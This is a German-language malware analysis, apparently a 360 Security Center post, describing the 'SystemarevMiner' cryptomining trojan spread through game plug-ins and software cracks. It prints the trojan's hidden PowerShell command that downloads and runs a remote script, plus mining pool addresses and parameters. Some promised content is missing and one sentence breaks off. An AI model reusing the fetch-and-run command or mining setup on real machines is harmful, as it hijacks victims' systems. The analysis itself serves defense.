360 Security Center hat vor kurzem eine Art von Cryptominer-Trojaner gefunden, der sich aktiv frei weiterverbreitet. Dieser Trojaner verbirgt sich zur Vermeidung der Ermittlung durch Antivirusprogramme hinter angesetzten Aufgaben als Cryptojacking-Malware. Selbst wenn ein Trojaner bereits ermittelt und entfernt wurde, kann er noch vorhanden sein, solange es die Script-Datei gibt. Wir haben ihn „SystemarevMiner“ benannt.
Analyse
Der Trojaner wird hauptsächlich durch Spiel-Plug-ins und Software-Cracks auf dem Computer des Nutzers installiert. Geben Sie die folgenden Dateien nach Herunterladen des Installationspakets frei:
c:\program files\systemarev\revservicesx\app_loader.exe
c:\program files\systemarev\revservicesx\systemupdate64x.exe
C:\Program Files\Common Files\restore_rev.bat
Erstellen mehrerer geplanter Aufgaben und Service-Startprogramme:
Die Datei restore_rev.bat ist als Hidden Property festgelegt und wird geplanten Aufgaben hinzugefügt. Die Batch-Datei nutzt PowerShell, um das neue PowerShell-Trojaner-Skript herunterzuladen:
powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command “iex ((new-object net.webclient).DownloadString(‘http://77.super-me.online/files/restore_rev_inj.ps1’))”
Restore_rev_inj.ps1 wird als PowerShell-Skript heruntergeladen. Der Inhalt wird unten angezeigt:
Durch das Skript sind die durch die Anwendung heruntergeladenen Dateien:
amd64.exe ist eine Mining-Anwendung, die für Krypto-Mining die OpenCL AMD-Grafikkarte nutzt
Mining-Parameter:“-B –no-color -r 50 -o 85.25.74.57:2228 -u x -p x –variant -1 -k –nicehash“
cud8.exe ist ein Mining-Tool, das für das Krypto-Mining NVIDIA-Grafikkarten nutzt
Mining-Parameter:“-B –no-color -r 50 -o 85.25.74.57:2229 -u x -p x –variant 1 -k –nicehash“
64.exe ist XMR/XMV, das für das Krypto-Mining CPU nutzt
Mining-Parameter:“–auto –any –forever –variation 3 -o xmr-us-east1.nanopool.org:14444 -u [HASH].jce2/x@x.com -p x“
Wir sehen die Einnahmen:
Der andere profitabelste Mining Pool:
Mining-Pool-Einnahmen des Kontos ingesamt:
MServicesX.exe ist ein Trojaner-Installationspaket, das die ersten drei Dateien der Installation wiederherstellen soll. Selbst wenn die.
Erinnerung
In letzter Zeit haben wir festgestellt, dass sich viele CryptoMiner-Trojaner in freier Wildbahn ausbreiten. Wir empfehlen Anwendern dringend, bei der Installation neuer Anwendungen Antivirus-Software einzusetzen. Anwendern wird auch empfohlen, gemeinsam mit 360 Total Security einen Virenscanner laufen zu lassen, um nicht zum CryptoMiner-Opfer zu werden.